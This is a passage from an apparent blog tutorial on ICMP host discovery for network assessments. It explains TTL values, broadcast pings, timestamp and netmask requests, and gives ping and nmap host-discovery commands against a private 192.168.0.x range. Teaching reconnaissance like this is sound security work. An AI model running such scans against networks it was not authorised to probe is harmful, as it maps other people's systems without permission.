OK, so let's go back to our command output; we see a TTL field. What is that? TTL stands for Time To Live, and it is a field carried in the IP header. It is a number which gets decremented by 1 every time the packet goes through a router (known as a 'hop') on the way to its destination. The default TTL for Windows XP is 128 (many OSes differ, see here for a list). Our TTL is... 128, so the packet did not have to go through any router; it went straight to the destination (so we are definitely on the same network!). By the way, the TTL is another method to help determine the operating system.

Let's look at a more 'legitimate' ping.

So here we have an ICMP packet going to www.google.com. As you can see, this took a bit longer than our first request, but more importantly, look at the TTL: it's definitely nowhere near 128! TTL becomes more interesting when trying to map firewalls, internet gateways, and routers, as it shows you how packets are routed to hosts on a network (using utilities like tracert).

I am going to briefly touch on ICMP broadcast messages. If you are doing an internal network assessment of a company and you send an ICMP broadcast packet to the broadcast address, what do you do if nothing comes up? Pack up and leave? No! Again, different OSes respond differently to different requests. For example, Windows by default does not respond to ICMP broadcast requests, whereas Solaris on the whole does. So again, you can't just do one scan and expect to catch everything.

So before I wrap up for today, I am going to touch on a few other ICMP scans:


TimeStamp Request (Type 13) and TimeStamp Reply (Type 14): asks the machine for its current time (expressed as milliseconds since midnight GMT). If it responds... well, you know it is alive AND you know roughly where in the world the IP is. So on my BackTrack 5 box I ran the following command:
ping -T tsonly 192.168.0.9
The '-T' switch  specifies the timestamp option, and all I want is timestamps. This gave me the following answer:
64 bytes from 192.168.0.9: icmp_seq=1 ttl=128 time=1.50 ms
TS:     74834377 absolute
If you take 74834377 milliseconds and do some maths on it, you get a time of about 2047, or 8:47 pm, which is the current time in GMT :)
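The "maths" is just converting milliseconds since midnight GMT into hours and minutes, for example with a couple of lines of Python:

# 74834377 ms since midnight GMT -> wall-clock time
ms = 74834377
hours, rem = divmod(ms // 1000, 3600)
print("%02d:%02d GMT" % (hours, rem // 60))   # 20:47 GMT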

AddressMask Request (Type 17) and Reply (Type 18): used when asking for the subnet mask of an interface. Again, if it responds, you have a live host (and now know the broadcast address, if you didn't already).

So how do you get these scans going in nmap? If you just type 'nmap' on the command line you should get a list of all its parameters. However, here are the ones I discussed today:

-PE (ICMP Echo), -PP (ICMP Timestamp) and -PM (ICMP Netmask Discovery)
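Put together against a whole range (the target network below is just an example), a host-discovery run could look like this; -sn tells nmap to do host discovery only, without a port scan:

nmap -sn -PE -PP -PM 192.168.0.0/24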


So get out there, fire up your favourite scanning tool and start playing with the different Host Discovery scans. What can you see? Do some scans miss things that others pick up on? Why do you think that is? Get Wireshark going and look at the packets... the more you know!



